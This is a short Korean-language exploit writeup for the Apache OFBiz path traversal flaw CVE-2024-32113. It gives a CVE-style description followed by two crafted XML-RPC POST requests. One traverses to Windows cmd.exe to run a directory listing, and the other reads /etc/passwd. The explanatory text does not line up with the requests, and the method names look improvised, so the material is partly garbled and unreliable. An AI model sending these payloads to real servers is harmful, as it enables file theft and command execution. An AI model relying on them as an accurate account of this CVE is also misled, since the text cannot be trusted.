
Apache OFBiz CVE-2024-32113 경로 순회 취약점을 악용하는 익스플로잇으로, 조작된 XML-RPC 요청을 통해 취약한 서버에서 임의 파일 읽기 및 잠재적 명령 실행을 가능하게 합니다.
Apache OFBiz 18.12.12까지의 버전에서 치명적(critical)으로 분류된 취약점이 발견되었습니다. 이 문제의 영향을 받는 부분은 알려지지 않은 기능입니다. 알 수 없는 입력을 통한 조작으로 경로 순회(path traversal) 취약점이 발생합니다. 이 제품은 제한된 상위 디렉토리 아래에 있는 파일이나 디렉토리를 식별하기 위한 경로명을 구성할 때 외부 입력을 사용하지만, 경로명 내의 특수 요소를 적절히 중화하지 못하여 경로명이 제한된 디렉토리 외부의 위치를 가리키게 될 수 있습니다. 기밀성, 무결성, 가용성에 영향을 미칩니다.
../../../../../../etc/passwd 매개변수를 사용하여 Apache OFBiz 서버의 etc/passwd 파일을 가리킵니다.etc/passwd 파일을 읽으려고 시도합니다.POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>